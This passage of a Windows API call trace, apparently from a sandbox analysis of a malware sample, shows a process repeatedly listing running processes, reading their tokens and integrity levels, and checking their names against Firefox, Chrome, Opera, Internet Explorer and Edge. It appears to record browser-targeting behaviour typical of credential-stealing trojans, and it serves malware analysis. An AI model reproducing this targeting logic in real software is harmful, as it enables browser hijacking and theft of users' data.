(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0555.119] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0555.119] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0555.119] GetLastError () returned 0x7a [0555.119] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0555.119] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0555.119] CloseHandle (hObject=0x29c) returned 1 [0555.119] CloseHandle (hObject=0x298) returned 1 [0555.119] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0555.119] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0555.119] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0555.119] GetLastError () returned 0x7a [0555.119] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0555.119] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0555.120] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0555.120] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0555.120] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0555.120] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0555.120] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0555.120] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0555.120] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0555.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0555.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0555.120] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0555.120] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0555.120] GetLastError () returned 0x7a [0555.120] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0555.120] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0555.120] CloseHandle (hObject=0x29c) returned 1 [0555.120] CloseHandle (hObject=0x298) returned 1 [0555.120] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0555.120] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0555.120] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0555.120] GetLastError () returned 0x7a [0555.120] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0555.120] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0555.120] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0555.120] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0555.120] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0555.120] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0555.120] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0555.120] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0555.120] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0555.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0555.120] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0555.120] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0555.120] GetLastError () returned 0x7a [0555.121] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0555.121] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0555.121] CloseHandle (hObject=0x29c) returned 1 [0555.121] CloseHandle (hObject=0x298) returned 1 [0555.121] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0555.121] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0555.121] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0555.121] GetLastError () returned 0x7a [0555.121] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0555.121] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0555.121] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0555.121] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0555.121] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0555.121] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0555.121] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0555.121] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0555.121] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0555.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0555.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0555.121] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0555.121] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0555.121] GetLastError () returned 0x7a [0555.121] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0555.121] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0555.121] CloseHandle (hObject=0x29c) returned 1 [0555.121] CloseHandle (hObject=0x298) returned 1 [0555.121] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0555.121] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0555.121] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0555.121] GetLastError () returned 0x7a [0555.121] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0555.122] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0555.122] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0555.122] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0555.122] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0555.122] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0555.122] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0555.122] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0555.122] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0555.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0555.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0555.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0555.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0555.122] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0555.122] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0555.122] GetLastError () returned 0x7a [0555.122] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0555.122] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0555.122] CloseHandle (hObject=0x29c) returned 1 [0555.122] CloseHandle (hObject=0x298) returned 1 [0555.122] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0555.122] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0555.122] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0555.122] GetLastError () returned 0x7a [0555.122] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0555.122] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0555.122] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0555.122] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0555.122] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0555.122] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0555.122] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0555.122] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0555.122] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0555.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0555.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0555.123] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0555.123] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0557.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa228) returned 0xc0000004 [0557.131] VirtualAlloc (lpAddress=0x0, dwSize=0xb228, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0557.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb228, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0557.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0557.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0557.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0557.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0557.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0557.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0557.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0557.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0557.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0557.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0557.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0557.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0557.135] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0557.135] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0557.135] GetLastError () returned 0x7a [0557.135] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0557.135] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0557.135] CloseHandle (hObject=0x29c) returned 1 [0557.135] CloseHandle (hObject=0x298) returned 1 [0557.135] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0557.136] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0557.136] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0557.136] GetLastError () returned 0x7a [0557.136] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0557.136] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0557.136] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0557.136] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0557.136] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0557.136] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0557.137] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0557.137] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0557.137] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0557.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0557.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0557.137] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0557.137] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0557.137] GetLastError () returned 0x7a [0557.137] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0557.137] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0557.138] CloseHandle (hObject=0x29c) returned 1 [0557.138] CloseHandle (hObject=0x298) returned 1 [0557.138] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0557.138] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0557.138] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0557.138] GetLastError () returned 0x7a [0557.138] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0557.138] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0557.138] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0557.139] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0557.139] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0557.139] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0557.139] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0557.139] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0557.139] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0557.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0557.139] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0557.139] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0557.139] GetLastError () returned 0x7a [0557.140] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0557.140] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0557.140] CloseHandle (hObject=0x29c) returned 1 [0557.140] CloseHandle (hObject=0x298) returned 1 [0557.140] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0557.140] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0557.140] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0557.140] GetLastError () returned 0x7a [0557.140] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0557.141] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, 